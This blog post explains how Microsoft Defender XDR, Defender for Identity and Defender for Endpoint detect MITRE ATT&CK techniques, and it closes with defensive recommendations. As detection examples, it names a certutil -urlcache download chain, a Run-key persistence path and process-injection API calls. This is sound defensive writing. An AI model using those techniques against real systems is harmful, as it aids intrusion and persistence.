How Microsoft Defender Detects MITRE ATT&CK Techniques

I wrote this while digging into how Microsoft Defender for Endpoint actually handles MITRE ATT&CK techniques. If you have Defender running and want to understand what it's actually watching for under the hood, this should give you a solid starting point.

Microsoft Defender XDR: Cross-Domain ATT&CK Coverage

If you are already familiar with the MITRE ATT&CK framework, you know that effective detection requires mapping each tactic and technique to a concrete toolchain. Microsoft Defender XDR (Extended Detection and Response) consolidates signals from identity, endpoint, cloud, and email into a unified detection platform. For a detailed introduction to the ATT&CK framework itself, refer to my dedicated article on MITRE ATT&CK.

Product	Tactic	Key Techniques
Defender XDR	Initial Access, Exfiltration	T1566, T1078, T1528
Defender for Identity	Lateral Movement, Priv. Esc.	T1550.002, T1550.003, T1558.003
Defender for Endpoint	Execution, Persistence, Defense Evasion	T1059, T1547, T1055

Defender XDR natively covers a broad set of ATT&CK tactics including Initial Access (T1566 Phishing, T1190 Exploit Public-Facing Application), Execution (T1059 Command and Scripting Interpreter), Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, and Exfiltration. The correlation engine joins alerts across Microsoft 365 Defender products into incidents, reducing mean time to detect (MTTD) for multi-stage attacks.

MITRE ATT&CK Enterprise — Microsoft Defender XDR, MDI, MDE coverage — MITRE ATT&CK Enterprise — Defender XDR · Defender for Identity · Defender for Endpoint coverage

Key XDR-level detections include Business Email Compromise (BEC) chains mapped to T1078 Valid Accounts + T1114 Email Collection, and OAuth abuse mapped to T1528 Steal Application Access Token. The Threat Analytics blade provides per-technique coverage cards aligned to ATT&CK, allowing security teams to identify gaps in their detection posture at a glance.

💡 The Threat Analytics blade is underrated: in five minutes it shows you exactly where you have coverage and where you don't, without consulting external docs.

Moving down a level, things get particularly interesting around lateral movement within Active Directory.

Microsoft Defender for Identity: Lateral Movement and Privilege Escalation

Defender for Identity (MDI) monitors Active Directory Domain Services traffic via a sensor deployed on domain controllers. Its detection capabilities are particularly strong against ATT&CK techniques that target identity infrastructure.

For Lateral Movement (TA0008), MDI detects:

T1550.002 Pass the Hash — anomalous NTLM authentication patterns where a hash is reused across systems without interactive logon.
T1550.003 Pass the Ticket — Kerberos ticket reuse from unexpected source IPs, indicative of Golden Ticket or Silver Ticket attacks.
T1021.002 SMB/Windows Admin Shares — lateral movement via administrative shares detected through SMB session analysis.

For Privilege Escalation (TA0004), MDI covers:

T1134 Access Token Manipulation — detection of token impersonation via suspicious Kerberos delegation requests.
T1484.001 Domain Policy Modification: Group Policy Object — alerts on unauthorized GPO changes that could enable persistence or privilege escalation.
T1558.003 Kerberoasting — detection of SPN enumeration and anomalous TGS requests targeting service accounts with weak passwords.

MDI also models behavioral baselines per entity (user, computer, group), enabling detection of anomalous reconnaissance activity mapped to T1087 Account Discovery and T1069 Permission Groups Discovery even when individual API calls appear benign.

Dropping to the endpoint layer, the detection granularity increases considerably.

Microsoft Defender for Endpoint: Execution, Persistence, and Defense Evasion

Defender for Endpoint (MDE) provides deep kernel-level telemetry from Windows, macOS, and Linux endpoints. Its ATT&CK coverage at the endpoint layer is the most granular of the three Defender products.

Execution (TA0002) detections include:

T1059.001 PowerShell — AMSI integration flags obfuscated scripts, encoded commands (-EncodedCommand), and known malicious cmdlets in real time.
T1059.003 Windows Command Shell — LOLBin chains such as cmd.exe /c certutil -urlcache -split are flagged via behavioral rules.
T1204.002 Malicious File — process tree analysis detects document-spawned child processes (Word to PowerShell, Excel to WScript) as indicators of macro execution.

💡 MDE's ASR rules are the most overlooked yet most effective feature against commodity malware. It's worth spending a few hours in audit mode before enabling them.

Persistence (TA0003) detections include:

T1547.001 Boot or Logon Autostart: Registry Run Keys — registry write monitoring flags additions to HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
T1053.005 Scheduled Task — scheduled task creation via schtasks.exe or the Task Scheduler COM interface is correlated with process lineage to identify suspicious origins.
T1543.003 Windows Service — new service installations with suspicious binary paths or DLL hijacking patterns are flagged via T1574.001 DLL Search Order Hijacking rules.

Defense Evasion (TA0005) is one of MDE's strongest detection categories:

T1055 Process Injection — memory scanning detects shellcode injection via VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread chains.
T1562.001 Disable or Modify Tools — tampering with Windows Defender settings via registry or PowerShell triggers immediate tamper protection alerts.
T1027 Obfuscated Files or Information — entropy analysis on scripts and binaries dropped to disk identifies packing or encoding that deviates from baseline.

Knowing what's covered is only half the work — the other half is knowing how to act on the data.

Practical Recommendations

Mapping Defender products to ATT&CK is only valuable if operationalized. Here are concrete actions for security teams:

Run the ATT&CK coverage assessment in Defender XDR (Threat Analytics then Coverage). Identify which techniques have no detection rule and prioritize them for custom detection creation.
Enable all MDI sensors on domain controllers, ADFS, and AD CS servers. The Active Directory Certificate Services attack surface — including ESC1 through ESC8 certificate template abuses — is only covered when the MDI sensor is deployed on the CA server.
Configure MDE attack surface reduction (ASR) rules in audit mode first, then enforcement. Rules targeting T1059, T1204, and T1547 can significantly reduce the blast radius of commodity malware without impacting legitimate workloads.
Correlate MDI lateral movement alerts with MDE process execution timelines. A Pass-the-Hash alert in MDI aligned with a mimikatz-like memory access event in MDE on the source machine is high-confidence evidence of credential dumping followed by lateral movement.
Export Defender XDR incidents to Microsoft Sentinel for long-term retention and ATT&CK-tagged hunting queries. KQL queries scoped to specific technique IDs operationalize the framework at scale.

The Defender suite provides solid ATT&CK coverage out of the box, but gaps exist — particularly in cloud-native techniques (T1537 Transfer Data to Cloud Account, T1619 Cloud Storage Object Discovery) that require Defender for Cloud Apps to be licensed and configured. Regular gap analysis against the ATT&CK matrix, combined with purple team exercises targeting uncovered techniques, remains the most reliable way to maintain detection efficacy.

This was a genuinely useful exercise for me to understand what Defender actually does. If you have questions or want to share your own experience with ATT&CK and Defender, feel free to reach out.